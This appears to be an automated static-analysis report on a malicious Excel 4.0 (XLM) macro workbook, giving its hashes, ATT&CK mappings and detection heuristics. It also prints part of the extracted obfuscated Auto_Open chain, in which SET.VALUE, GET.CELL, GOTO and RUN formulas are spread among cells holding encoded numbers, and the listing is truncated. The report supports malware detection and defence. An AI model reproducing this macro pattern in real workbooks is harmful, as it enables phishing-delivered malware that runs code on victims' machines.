Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7d66020aacc74034…

MALICIOUS

Office (OLE)

230.0 KB Created: 2020-05-15 06:56:24 Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: e4d5835bcd5f8486e0a9e953a1d3b7eb SHA-1: 81534290d8925e44c94d75b78bad83ed44a2727c SHA-256: 7d66020aacc740343595ac42110dce55fed377f7c9a3c21de310b8ef206b02df
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains Excel 4.0 macros, specifically an obfuscated Auto_Open execution chain. The `RUN(EC24422)` command within the macro suggests it is designed to execute arbitrary code, likely downloading and running a second-stage payload. The presence of an Auto_Open macro indicates it was likely delivered as a spearphishing attachment.

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 127549 bytes
SHA-256: e2e0e2d9400a3b7c3f2f4f7f99f73232325b94ccfcfff8f049f74d461096af6c
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!K44061 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,IG27,"",-1.90825688073394506006
'  Sheet,BD56,"",0.09090909090909091161
'  Sheet,HS71,"",-107.00000000000000000000
'  Sheet,JK83,"SET.VALUE(ES51267,151-GET.CELL(17,EB43877))",""
'  Sheet,JK84,RUN(EC24422),""
'  Sheet,GM151,"",-85.00000000000000000000
'  Sheet,IJ167,"",-0.44711538461538463674
'  Sheet,B205,"",-230.00000000000000000000
'  Sheet,JI233,"",6.00000000000000000000
'  Sheet,C234,"",-1.95652173913043481157
'  Sheet,HI272,"",-408.00000000000000000000
'  Sheet,DX304,"",247.00000000000000000000
'  Sheet,JT305,"",3.60784313725490202174
'  Sheet,GN373,"",0.37358590566037730429
'  Sheet,GW379,"",5.05102040816326525174
'  Sheet,HF493,"",323.00000000000000000000
'  Sheet,HC511,"",2.63529411764705878696
'  Sheet,ER548,"",410.00000000000000000000
'  Sheet,JE552,"",0.16363636363636363535
'  Sheet,J555,"",-0.25672371638141811001
'  Sheet,CO583,"",200.00000000000000000000
'  Sheet,BN660,"",-0.21311475409836064254
'  Sheet,FE742,"SET.VALUE(BB8632,GET.CELL(50,EB16762)+-287.00000000000000000000-4)",""
'  Sheet,FE743,GOTO(CA55734),""
'  Sheet,DE828,"",-286.00000000000000000000
'  Sheet,DL844,"",-0.93181818181818176772
'  Sheet,GY864,"",-1.70731707317073166941
'  Sheet,BW872,"",-20.40000000000000568434
'  Sheet,BN877,"",0.58695652173913048788
'  Sheet,EH978,"",132.00000000000000000000
'  Sheet,DM992,"",86.00000000000000000000
'  Sheet,HL1111,"",1.68807339449541293774
'  Sheet,DE1128,"",266.00000000000000000000
'  Sheet,HV1170,"",-329.25000000000000000000
'  Sheet,EA1242,"",-125.00000000000000000000
'  Sheet,JH1259,"",2.02197802197802189994
'  Sheet,DV1265,"",-5.59999999999999431566
'  Sheet,FF1295,"",18.75000000000000000000
'  Sheet,FX1346,"",-200.00000000000000000000
'  Sheet,DM1365,"",-2.71929824561403510330
'  Sheet,IB1393,"",-8.18000488281250071054
'  Sheet,IJ1427,"",-183.00000000000000000000
'  Sheet,JE1436,"",0.42391304347826086474
'  Sheet,BJ1457,"SET.VALUE(FC34223,-148.00000000000000000000-GET.CELL(17,HK32871))",""
'  Sheet,BJ1458,RUN(H40614),""
'  Sheet,CN1528,"",-259.00000000000000000000
'  Sheet,DN1533,"",-1.96202531645569622221
'  Sheet,BV1536,"",-212.00000000000000000000
'  Sheet,FR1565,"",-225.00000000000000000000
'  Sheet,J1654,"",42.20003906249999658939
'  Sheet,CK1709,"",77.00000000000000000000
'  Sheet,HZ1824,"",-401.00000000000000000000
'  Sheet,JI1971,"",2.33599999999999985434
'  Sheet,GK2024,"",93.00000000000000000000
'  Sheet,IY2117,"",-101.00000000000000000000
'  Sheet,BP2134,"",11.00000000000000000000
'  Sheet,IY2144,"",-0.38620689655172413257
'  Sheet,FH2189,"",2.59016293442622957954
'  Sheet,EX2254,"",-4.50000000000000000000
'  Sheet,FB2358,"",75.00000000000000000000
'  Sheet,BM2359,"",3.40000000000000568434
'  Sheet,M2391,"",258.00000000000000000000
'  Sheet,CG2393,"",454.00000000000000000000
'  Sheet,FY2446,"",-510.00000000000000000000
'  Sheet,DE2473,"",2.22619047619047627506
'  Sheet,BR2564,"",280.00000000000000000000
'  Sheet,EY2567,"",7.38805970149253710133
'  Sheet,BV2573,"",2.59154929577464798740
'  Sheet,ID2595,"",-0.08312958435207823404
'  Sheet,JK2614,"",1.23883928571428580945
'  Sheet,HW2627,"",4.48780387804878078128
'  Sheet,GC2674,"",-93.00000000000000000000
'  Sheet,GY2715,"",-70.75000000000000000000
'  Sheet,M2794,"",-87.20007812500000454747
'  Sheet,HZ2872,"",0.61956521739130432369
'  Sheet,BI2879,"",-182.00000000000000000000
'  Sheet,JM2905,"",186.00000000000000000000
'  Sheet,JS2938,"",0.34545454545454545858
'  Sheet,GH2966,"",-0.20537897310513447691
'  Sheet,HO2995,"",0.22962962962962962798
'  Sheet,CZ3025,"",90.20007812500000454747
'  Sheet,EC3050,"",114.00000000000000000000
'  Sheet,HJ3068,"",-0
... (truncated)